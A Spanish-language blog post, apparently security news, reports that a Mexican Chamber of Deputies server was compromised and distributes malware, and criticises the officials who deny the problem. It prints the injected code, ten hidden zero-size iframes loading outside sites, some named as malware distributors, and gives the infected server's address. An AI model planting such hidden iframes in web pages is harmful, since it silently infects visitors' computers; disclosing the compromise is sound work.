Más en HackMasiosare ha realizado una serie de descubrimientos sobre la Cámara de Diputados, esa misma que la semana pasada le cambiaron la portada, que hace tiempo guardaba porno y estaba disponible a cualquiera que quisiera descargarlo y no hace mucho mostraba el archivo shadow de usuarios y contraseñas en Unix.

Descubrió que el servidor de la Cámara de Diputados distribuye Malware. Mientras nadie lo solucione el servidor es este:

http://pac.diputados.gob.mx

Advertencia: Se recomiendar visitar el servidor con Firefox, nonscript activado y un antivirus actualizado. Si es posible usar GNU/Linux. De lo contrario sufre el riesgo que su computadora se vuelva zombie.

Este sitio web contiene el siguiente código:
   1: <iframe src=”http://www.bsupport.clara.net/cgi/” frameborder=”0″ width=”0″ height=”0″>iframe>
   2: <iframe src=”http://oscentolos.com/cgi/” frameborder=”0″ width=”0″ height=”0″>iframe>
   3: <iframe src=”http://thatsentertainmentinoz.com.au/log/” frameborder=”0″ width=”0″ height=”0″>iframe>
   4: <iframe src=”http://www.kawaart.com/cgi/” frameborder=”0″ width=”0″ height=”0″>iframe>
   5: <iframe src=”http://www.lindomar.com.br/cgi/index.html” frameborder=”0″ width=”0″ height=”0″>iframe>
   6: <iframe src=”http://www.youtube.com/watch?v=jTah9ckvV3Y” frameborder=”0″ width=”0″ height=”0″>iframe>
   7: <iframe src=”http://mavideniz1.org/forum/” frameborder=”0″ width=”0″ height=”0″>iframe>
   8: <iframe src=”http://siyamiozkan.com.tr/forum” frameborder=”0″ width=”0″ height=”0″>iframe>
   9: <iframe src=”http://mavi1.org/” frameborder=”0″ width=”0″ height=”0″>iframe>
  10: <iframe src=”http://mavideniz1.org/” frameborder=”0″ width=”0″ height=”0″>iframe

Del cual algunos sitios distribuyen malware. El responsable del desface es un hacker turco que esta relacionado con un incidente con miles de computadoras.

Preocupa que se puede tener acceso a los servidores y que posiblemente una gran parte de ellos estén siendo usados por personas ajenas a los administradores.

Además de tener una versión vieja y vulnerable de su base de datos, visible para todo el público. Lo más lamentable es que nieguen que el problema existe.